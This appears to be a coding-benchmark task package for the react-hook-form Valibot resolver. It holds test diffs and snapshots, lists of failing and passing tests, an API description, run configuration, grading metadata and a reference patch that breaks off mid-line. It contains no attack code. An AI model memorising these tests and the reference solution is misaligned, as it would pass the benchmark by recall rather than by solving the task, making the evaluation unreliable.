expect(passwordField.validationMessage).toBe(''); + + await user.click(screen.getByText(/submit/i)); + + // username + usernameField = screen.getByPlaceholderText(/username/i) as HTMLInputElement; + expect(usernameField.validity.valid).toBe(false); + expect(usernameField.validationMessage).toBe(USERNAME_REQUIRED_MESSAGE); + + // password + passwordField = screen.getByPlaceholderText(/password/i) as HTMLInputElement; + expect(passwordField.validity.valid).toBe(false); + expect(passwordField.validationMessage).toBe(PASSWORD_REQUIRED_MESSAGE); + + await user.type(screen.getByPlaceholderText(/password/i), 'password'); + + // password + passwordField = screen.getByPlaceholderText(/password/i) as HTMLInputElement; + expect(passwordField.validity.valid).toBe(true); + expect(passwordField.validationMessage).toBe(''); +}); diff --git a/valibot/src/__tests__/Form.tsx b/valibot/src/__tests__/Form.tsx new file mode 100644 index 0000000..058a9c8 --- /dev/null +++ b/valibot/src/__tests__/Form.tsx @@ -0,0 +1,61 @@ +import React from 'react'; +import { render, screen } from '@testing-library/react'; +import user from '@testing-library/user-event'; +import { useForm } from 'react-hook-form'; +import { string, required, object, minLength } from 'valibot'; +import { valibotResolver } from '..'; + +const USERNAME_REQUIRED_MESSAGE = 'username field is required'; +const PASSWORD_REQUIRED_MESSAGE = 'password field is required'; + +const schema = required( + object({ + username: string(USERNAME_REQUIRED_MESSAGE, [ + minLength(2, USERNAME_REQUIRED_MESSAGE), + ]), + password: string(PASSWORD_REQUIRED_MESSAGE, [ + minLength(2, PASSWORD_REQUIRED_MESSAGE), + ]), + }), +); + +type FormData = { username: string; password: string }; + +interface Props { + onSubmit: (data: FormData) => void; +} + +function TestComponent({ onSubmit }: Props) { + const { + register, + handleSubmit, + formState: { errors }, + } = useForm<FormData>({ + resolver: valibotResolver(schema), // Useful to check TypeScript 
regressions + }); + + return ( + <form onSubmit={handleSubmit(onSubmit)}> + <input {...register('username')} /> + {errors.username && <span role="alert">{errors.username.message}</span>} + + <input {...register('password')} /> + {errors.password && <span role="alert">{errors.password.message}</span>} + + <button type="submit">submit</button> + </form> + ); +} + +test("form's validation with Valibot and TypeScript's integration", async () => { + const handleSubmit = vi.fn(); + render(<TestComponent onSubmit={handleSubmit} />); + + expect(screen.queryAllByRole('alert')).toHaveLength(0); + + await user.click(screen.getByText(/submit/i)); + + expect(screen.getByText(/username field is required/i)).toBeInTheDocument(); + expect(screen.getByText(/password field is required/i)).toBeInTheDocument(); + expect(handleSubmit).not.toHaveBeenCalled(); +}); diff --git a/valibot/src/__tests__/__fixtures__/data.ts b/valibot/src/__tests__/__fixtures__/data.ts index c0c9360..c390572 100644 --- a/valibot/src/__tests__/__fixtures__/data.ts +++ b/valibot/src/__tests__/__fixtures__/data.ts @@ -12,6 +12,7 @@ import { array, boolean, required, + union } from 'valibot'; export const schema = required( @@ -28,7 +29,7 @@ export const schema = required( minLength(8, 'Must be at least 8 characters in length'), ]), repeatPassword: string('Repeat Password is required'), - accessToken: string('Access token is required'), + accessToken: union([string('Access token should be a string'), number('Access token should be a number')], "access token is required"), birthYear: number('Please enter your birth year', [ minValue(1900), maxValue(2013), diff --git a/valibot/src/__tests__/__snapshots__/valibot.ts.snap b/valibot/src/__tests__/__snapshots__/valibot.ts.snap index 96be6d9..bf5ed90 100644 --- a/valibot/src/__tests__/__snapshots__/valibot.ts.snap +++ b/valibot/src/__tests__/__snapshots__/valibot.ts.snap @@ -77,3 +77,342 @@ exports[`valibotResolver > should return a single error from valibotResolver whe 
"values": {}, } `; + +exports[`valibotResolver > should return a single error from valibotResolver with \`mode: sync\` when validation fails 1`] = ` +{ + "errors": { + "accessToken": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + }, + "birthYear": { + "message": "Please enter your birth year", + "ref": undefined, + "type": "number", + }, + "email": { + "message": "Invalid email address", + "ref": { + "name": "email", + }, + "type": "email", + }, + "enabled": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + }, + "like": { + "id": { + "message": "Like id is required", + "ref": undefined, + "type": "number", + }, + "name": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + }, + }, + "password": { + "message": "One uppercase character", + "ref": { + "name": "password", + }, + "type": "regex", + }, + "repeatPassword": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + }, + "tags": [ + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + }, + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + }, + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + }, + ], + "username": { + "message": "Invalid type", + "ref": { + "name": "username", + }, + "type": "non_optional", + }, + }, + "values": {}, +} +`; + +exports[`valibotResolver > should return all the errors from valibotResolver when validation fails with \`validateAllFieldCriteria\` set to true 1`] = ` +{ + "errors": { + "accessToken": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + "birthYear": { + "message": "Please enter your birth year", + "ref": undefined, + "type": "number", + "types": { + "number": "Please enter your birth year", + }, + }, + "email": { + "message": "Invalid email address", + "ref": { + "name": "email", + }, 
+ "type": "email", + "types": { + "email": "Invalid email address", + }, + }, + "enabled": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + "like": { + "id": { + "message": "Like id is required", + "ref": undefined, + "type": "number", + "types": { + "number": "Like id is required", + }, + }, + "name": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + }, + "password": { + "message": "One uppercase character", + "ref": { + "name": "password", + }, + "type": "regex", + "types": { + "min_length": "Must be at least 8 characters in length", + "regex": [ + "One uppercase character", + "One lowercase character", + "One number", + ], + }, + }, + "repeatPassword": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + "tags": [ + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + "types": { + "string": "Tags should be strings", + }, + }, + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + "types": { + "string": "Tags should be strings", + }, + }, + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + "types": { + "string": "Tags should be strings", + }, + }, + ], + "username": { + "message": "Invalid type", + "ref": { + "name": "username", + }, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + }, + "values": {}, +} +`; + +exports[`valibotResolver > should return all the errors from valibotResolver when validation fails with \`validateAllFieldCriteria\` set to true and \`mode: sync\` 1`] = ` +{ + "errors": { + "accessToken": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + "birthYear": { + "message": "Please 
enter your birth year", + "ref": undefined, + "type": "number", + "types": { + "number": "Please enter your birth year", + }, + }, + "email": { + "message": "Invalid email address", + "ref": { + "name": "email", + }, + "type": "email", + "types": { + "email": "Invalid email address", + }, + }, + "enabled": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + "like": { + "id": { + "message": "Like id is required", + "ref": undefined, + "type": "number", + "types": { + "number": "Like id is required", + }, + }, + "name": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + }, + "password": { + "message": "One uppercase character", + "ref": { + "name": "password", + }, + "type": "regex", + "types": { + "min_length": "Must be at least 8 characters in length", + "regex": [ + "One uppercase character", + "One lowercase character", + "One number", + ], + }, + }, + "repeatPassword": { + "message": "Invalid type", + "ref": undefined, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + "tags": [ + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + "types": { + "string": "Tags should be strings", + }, + }, + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + "types": { + "string": "Tags should be strings", + }, + }, + { + "message": "Tags should be strings", + "ref": undefined, + "type": "string", + "types": { + "string": "Tags should be strings", + }, + }, + ], + "username": { + "message": "Invalid type", + "ref": { + "name": "username", + }, + "type": "non_optional", + "types": { + "non_optional": "Invalid type", + }, + }, + }, + "values": {}, +} +`; + +exports[`valibotResolver > should return parsed values from valibotResolver with \`mode: sync\` when validation pass 1`] = ` +{ + "errors": {}, + "values": { + 
"accessToken": "accessToken", + "birthYear": 2000, + "email": "john@doe.com", + "enabled": true, + "like": { + "id": 1, + "name": "name", + }, + "password": "Password123_", + "repeatPassword": "Password123_", + "tags": [ + "tag1", + "tag2", + ], + "username": "Doe", + }, +} +`; diff --git a/valibot/src/__tests__/valibot.ts b/valibot/src/__tests__/valibot.ts index a7d5144..c91835f 100644 --- a/valibot/src/__tests__/valibot.ts +++ b/valibot/src/__tests__/valibot.ts @@ -1,9 +1,51 @@ /* eslint-disable no-console, @typescript-eslint/ban-ts-comment */ import { valibotResolver } from '..'; import { schema, validData, fields, invalidData } from './__fixtures__/data'; +import * as valibot from 'valibot'; const shouldUseNativeValidation = false; describe('valibotResolver', () => { + it('should return parsed values from valibotResolver with `mode: sync` when validation pass', async () => { + vi.mock('valibot', async () => { + const a = await vi.importActual<any>('valibot'); + return { + __esModule: true, + ...a, + }; + }); + const parseSpy = vi.spyOn(valibot, 'parse'); + const parseAsyncSpy = vi.spyOn(valibot, 'parseAsync'); + + const result = await valibotResolver(schema, undefined, { + mode: 'sync', + })(validData, undefined, { fields, shouldUseNativeValidation }); + + expect(parseSpy).toHaveBeenCalledTimes(1); + expect(parseAsyncSpy).not.toHaveBeenCalled(); + expect(result.errors).toEqual({}); + expect(result).toMatchSnapshot(); + }); + + it('should return a single error from valibotResolver with `mode: sync` when validation fails', async () => { + vi.mock('valibot', async () => { + const a = await vi.importActual<any>('valibot'); + return { + __esModule: true, + ...a, + }; + }); + const parseSpy = vi.spyOn(valibot, 'parse'); + const parseAsyncSpy = vi.spyOn(valibot, 'parseAsync'); + + const result = await valibotResolver(schema, undefined, { + mode: 'sync', + })(invalidData, undefined, { fields, shouldUseNativeValidation }); + + expect(parseSpy).toHaveBeenCalledTimes(1); 
+ expect(parseAsyncSpy).not.toHaveBeenCalled(); + expect(result).toMatchSnapshot(); + }); + it('should return values from valibotResolver when validation pass', async () => { const result = await valibotResolver(schema)(validData, undefined, { fields, @@ -21,4 +63,39 @@ describe('valibotResolver', () => { expect(result).toMatchSnapshot(); }); + + it('should return values from valibotResolver when validation pass & raw=true', async () => { + const result = await valibotResolver(schema, undefined, { + raw: true, + })(validData, undefined, { + fields, + shouldUseNativeValidation, + }); + + expect(result).toEqual({ errors: {}, values: validData }); + }); + + it('should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true', async () => { + const result = await valibotResolver(schema)(invalidData, undefined, { + fields, + criteriaMode: 'all', + shouldUseNativeValidation, + }); + + expect(result).toMatchSnapshot(); + }); + + it('should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`', async () => { + const result = await valibotResolver(schema, undefined, { mode: 'sync' })( + invalidData, + undefined, + { + fields, + criteriaMode: 'all', + shouldUseNativeValidation, + }, + ); + + expect(result).toMatchSnapshot(); + }); });
[ "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`" ]
[ "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver with `mode: sync` when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when some property is undefined and result will keep the input data structure", "src/__tests__/validateFieldsNatively.ts > validates natively fields", "nope/src/__tests__/Form-native-validation.tsx > form's native validation with Nope", "ajv/src/__tests__/Form.tsx > form's validation with Ajv and TypeScript's integration", "nope/src/__tests__/nope.ts > nopeResolver > should return values from nopeResolver when validation pass", "nope/src/__tests__/nope.ts > nopeResolver > should return a single error from nopeResolver when validation fails", "zod/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", 
"src/__tests__/toNestObject.ts > transforms flat object to nested object", "src/__tests__/toNestObject.ts > transforms flat object to nested object and shouldUseNativeValidation: true", "yup/src/__tests__/Form-native-validation.tsx > form's native validation with Yup", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return values from arktypeResolver when validation pass & raw=true", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return a single error from arktypeResolver when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver with `mode: sync` when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver with `mode: sync` when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "yup/src/__tests__/yup.ts > yupResolver > should return an error from yupResolver when validation fails and pass down the yup context", "yup/src/__tests__/yup.ts > yupResolver > should return correct error message with using yup.test", "yup/src/__tests__/yup.ts > yupResolver > should merge default yup resolver options with yup's options", "yup/src/__tests__/yup.ts > yupResolver > should throw an error without inner property", "yup/src/__tests__/yup.ts > yupResolver > should throw any error unrelated to Yup", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass & raw=true", "yup/src/__tests__/yup.ts > yupResolver > shoud 
validate a lazy schema with success", "valibot/src/__tests__/valibot.ts > valibotResolver > should return parsed values from valibotResolver with `mode: sync` when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver with `mode: sync` when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass & raw=true", "valibot/src/__tests__/Form.tsx > form's validation with Valibot and TypeScript's integration", "nope/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "yup/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "computed-types/src/__tests__/Form.tsx > form's validation with computed-types and TypeScript's integration", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return values from computedTypesResolver when validation pass", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return a single error from computedTypesResolver when validation fails", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should throw any error unrelated to computed-types", "zod/src/__tests__/zod.ts > zodResolver > should return values from zodResolver when validation pass & raw=true", "zod/src/__tests__/zod.ts > zodResolver > should return parsed values from zodResolver with `mode: sync` when validation pass", "zod/src/__tests__/zod.ts > zodResolver > should return a single error from zodResolver when validation fails", "zod/src/__tests__/zod.ts > zodResolver > should return a single error from zodResolver with `mode: sync` when validation fails", 
"zod/src/__tests__/zod.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true", "zod/src/__tests__/zod.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "zod/src/__tests__/zod.ts > zodResolver > should throw any error unrelated to Zod", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return a single error from superstructResolver when validation fails", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass & raw=true", "typanion/src/__tests__/typanion.ts > typanionResolver > should return values from typanionResolver when validation pass", "typanion/src/__tests__/typanion.ts > typanionResolver > should return a single error from typanionResolver when validation fails", "computed-types/src/__tests__/Form-native-validation.tsx > form's native validation with computed-types", "joi/src/__tests__/Form.tsx > form's validation with Joi and TypeScript's integration", "superstruct/src/__tests__/Form.tsx > form's validation with Superstruct and TypeScript's integration", "zod/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "typanion/src/__tests__/Form.tsx > form's validation with Typanion and TypeScript's integration", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver with `mode: sync` when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false", 
"vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should call a suite with values, validated field names and a context as arguments", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return a single error from typeboxResolver when validation fails", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return all the errors from typeboxResolver when validation fails with `validateAllFieldCriteria` set to true", "typebox/src/__tests__/typebox.ts > typeboxResolver > should validate with success", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver with `mode: sync` when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver with `mode: sync` when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass and pass down the Joi context", 
"joi/src/__tests__/Form-native-validation.tsx > form's native validation with Joi", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values as a raw object from classValidatorResolver when `rawValues` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver with `mode: sync` when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver with `mode: sync` when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "class-validator/src/__tests__/class-validator.ts > validate data with transformer option", "class-validator/src/__tests__/class-validator.ts > validate data with validator option", "class-validator/src/__tests__/class-validator.ts > should return from classValidatorResolver with `excludeExtraneousValues` set to true", "valibot/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "vest/src/__tests__/Form.tsx > form's validation with Vest and TypeScript's integration", "arktype/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "superstruct/src/__tests__/Form-native-validation.tsx > form's native validation 
with Superstruct", "class-validator/src/__tests__/Form-native-validation.tsx > form's native validation with Class Validator", "arktype/src/__tests__/Form.tsx > form's validation with arkType and TypeScript's integration", "typanion/src/__tests__/Form-native-validation.tsx > form's native validation with Typanion", "vest/src/__tests__/Form-native-validation.tsx > form's native validation with Vest", "typebox/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "typebox/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "class-validator/src/__tests__/Form.tsx > form's validation with Class Validator and TypeScript's integration", "ajv/src/__tests__/Form-native-validation.tsx > form's native validation with Ajv", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for an exact intersection type error object", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for a branded intersection", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return values from ioTsResolver when validation pass", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return a single error from ioTsResolver when validation fails", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return all the errors from ioTsResolver when validation fails with `validateAllFieldCriteria` set to true", "io-ts/src/__tests__/Form.tsx > form's validation with io-ts and TypeScript's integration", "io-ts/src/__tests__/Form-native-validation.tsx > form's native validation with io-ts" ]
Method: valibotResolver(schema, schemaOptions?, resolverOptions?) → async (values, _, options) ⇒ Promise<{ values: any; errors: FieldErrors }> Location: src/valibot.ts Inputs: - **schema** – `BaseSchema | BaseSchemaAsync` – the Valibot schema to validate against. - **schemaOptions** – optional object (default `{ abortEarly: false, abortPipeEarly: false }`) that configures Valibot parsing behaviour. - **resolverOptions** – optional object (default `{}`) with: - `mode?: 'async' | 'sync'` – selects `parseAsync` or `parse` for validation. - `raw?: boolean` – if true, the resolver returns the original `values` instead of the parsed result. - The returned async function receives: - `values` – the form values to validate. - `_` – unused context parameter (kept for RHF compatibility). - `options` – RHF resolver options (`fields`, `criteriaMode`, `shouldUseNativeValidation`, etc.). Outputs: - Resolves to an object `{ values, errors }` where: - `values` is either the parsed data (default) or the original `values` when `resolverOptions.raw` is true. - `errors` is a `FieldErrors` map built from Valibot `ValiError` issues; when `options.criteriaMode === 'all'` and native validation is not used, all error criteria are included. Description: `valibotResolver` creates a React‑Hook‑Form resolver that validates form data against a Valibot schema. It supports synchronous (`mode: 'sync'`) and asynchronous (`mode: 'async'`) validation, optional raw value return, and full‑criteria error collection when `criteriaMode: 'all'` is requested. Use it by passing the resolver to `useForm({ resolver: valibotResolver(schema) })` or with the additional options shown above.
MIT
{ "base_image_name": "node_20", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx vitest run --reporter=verbose --color=false" }
{ "num_modified_files": 1, "num_modified_lines": 67, "pr_author": "jorisre", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding more tests, supporting `criteriaMode` (validateAllFieldCriteria) and reducing bundle size for the Valibot resolver. The provided test patch verifies those behaviors, including sync mode handling and criteriaMode errors, confirming alignment with the stated requirements. There are no signals of test‑suite coupling, implicit naming, external dependencies, ambiguous specs, unrelated patch artifacts, or hidden domain knowledge. Thus the task is well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": 
null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
a9d319d43291d4f01616f5d5424c6b19dacdd4e7
2023-08-20 09:53:21
github-actions[bot]: **Size Change:** +364 B (+1%) **Total Size:** 25.4 kB | Filename | Size | Change | | | :--- | :---: | :---: | :---: | | `dist/resolvers.js` | 484 B | +125 B (+35%) | 🚨 | | `dist/resolvers.module.js` | 491 B | +118 B (+32%) | 🚨 | | `dist/resolvers.umd.js` | 575 B | +121 B (+27%) | 🚨 | <details><summary>ℹ️ <strong>View Unchanged</strong></summary> | Filename | Size | | :--- | :---: | | `ajv/dist/ajv.js` | 638 B | | `ajv/dist/ajv.module.js` | 597 B | | `ajv/dist/ajv.umd.js` | 751 B | | `arktype/dist/arktype.js` | 327 B | | `arktype/dist/arktype.module.js` | 343 B | | `arktype/dist/arktype.umd.js` | 422 B | | `class-validator/dist/class-validator.js` | 537 B | | `class-validator/dist/class-validator.module.js` | 561 B | | `class-validator/dist/class-validator.umd.js` | 640 B | | `computed-types/dist/computed-types.js` | 386 B | | `computed-types/dist/computed-types.module.js` | 401 B | | `computed-types/dist/computed-types.umd.js` | 477 B | | `io-ts/dist/io-ts.js` | 1.28 kB | | `io-ts/dist/io-ts.module.js` | 1.18 kB | | `io-ts/dist/io-ts.umd.js` | 1.41 kB | | `joi/dist/joi.js` | 592 B | | `joi/dist/joi.module.js` | 610 B | | `joi/dist/joi.umd.js` | 698 B | | `nope/dist/nope.js` | 345 B | | `nope/dist/nope.module.js` | 365 B | | `nope/dist/nope.umd.js` | 434 B | | `superstruct/dist/superstruct.js` | 324 B | | `superstruct/dist/superstruct.module.js` | 342 B | | `superstruct/dist/superstruct.umd.js` | 424 B | | `typanion/dist/typanion.js` | 323 B | | `typanion/dist/typanion.module.js` | 336 B | | `typanion/dist/typanion.umd.js` | 418 B | | `typebox/dist/typebox.js` | 464 B | | `typebox/dist/typebox.module.js` | 482 B | | `typebox/dist/typebox.umd.js` | 579 B | | `valibot/dist/valibot.js` | 577 B | | `valibot/dist/valibot.module.js` | 594 B | | `valibot/dist/valibot.umd.js` | 684 B | | `vest/dist/vest.js` | 480 B | | `vest/dist/vest.module.js` | 443 B | | `vest/dist/vest.umd.js` | 569 B | | `yup/dist/yup.js` | 626 B | | `yup/dist/yup.module.js` | 640 
B | | `yup/dist/yup.umd.js` | 729 B | | `zod/dist/zod.js` | 581 B | | `zod/dist/zod.module.js` | 602 B | | `zod/dist/zod.umd.js` | 688 B | </details> <a href="https://github.com/preactjs/compressed-size-action"><sub>compressed-size-action</sub></a>
react-hook-form__resolvers-621
diff --git a/.vscode/settings.json b/.vscode/settings.json index eaf6a64..eb5a19a 100644 --- a/.vscode/settings.json +++ b/.vscode/settings.json @@ -5,7 +5,7 @@ "typescript", "typescriptreact" ], - "prettier.configPath": "./.prettierrc.js", + "prettier.configPath": "./prettier.config.cjs", "editor.formatOnSave": true, "editor.codeActionsOnSave": { "source.fixAll.eslint": true diff --git a/ajv/src/ajv.ts b/ajv/src/ajv.ts index b3de2c6..7d4d20c 100644 --- a/ajv/src/ajv.ts +++ b/ajv/src/ajv.ts @@ -1,4 +1,4 @@ -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import Ajv, { DefinedError } from 'ajv'; import ajvErrors from 'ajv-errors'; import { appendErrors, FieldError } from 'react-hook-form'; @@ -76,7 +76,7 @@ export const ajvResolver: Resolver = ? { values, errors: {} } : { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrorSchema( validate.errors as DefinedError[], !options.shouldUseNativeValidation && diff --git a/arktype/src/arktype.ts b/arktype/src/arktype.ts index 4bba328..d42f002 100644 --- a/arktype/src/arktype.ts +++ b/arktype/src/arktype.ts @@ -1,5 +1,5 @@ import { FieldError, FieldErrors } from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import type { Resolver } from './types'; import { Problems } from 'arktype'; @@ -28,7 +28,7 @@ export const arktypeResolver: Resolver = if (result.problems) { return { values: {}, - errors: toNestError(parseErrorSchema(result.problems), options), + errors: toNestErrors(parseErrorSchema(result.problems), options), }; } diff --git a/class-validator/src/class-validator.ts b/class-validator/src/class-validator.ts index 4f9464b..cd10370 100644 --- a/class-validator/src/class-validator.ts +++ b/class-validator/src/class-validator.ts @@ -1,5 +1,5 @@ import { FieldErrors } from 
'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import { plainToClass } from 'class-transformer'; import { validate, validateSync, ValidationError } from 'class-validator'; import type { Resolver } from './types'; @@ -47,7 +47,7 @@ export const classValidatorResolver: Resolver = if (rawErrors.length) { return { values: {}, - errors: toNestError( + errors: toNestErrors( parseErrors( rawErrors, !options.shouldUseNativeValidation && diff --git a/computed-types/src/computed-types.ts b/computed-types/src/computed-types.ts index f84b48a..1cf1306 100644 --- a/computed-types/src/computed-types.ts +++ b/computed-types/src/computed-types.ts @@ -1,5 +1,5 @@ import type { FieldErrors } from 'react-hook-form'; -import { toNestError, validateFieldsNatively } from '@hookform/resolvers'; +import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; import type { Resolver } from './types'; import type { ValidationError } from 'computed-types'; @@ -33,7 +33,7 @@ export const computedTypesResolver: Resolver = if (isValidationError(error)) { return { values: {}, - errors: toNestError(parseErrorSchema(error), options), + errors: toNestErrors(parseErrorSchema(error), 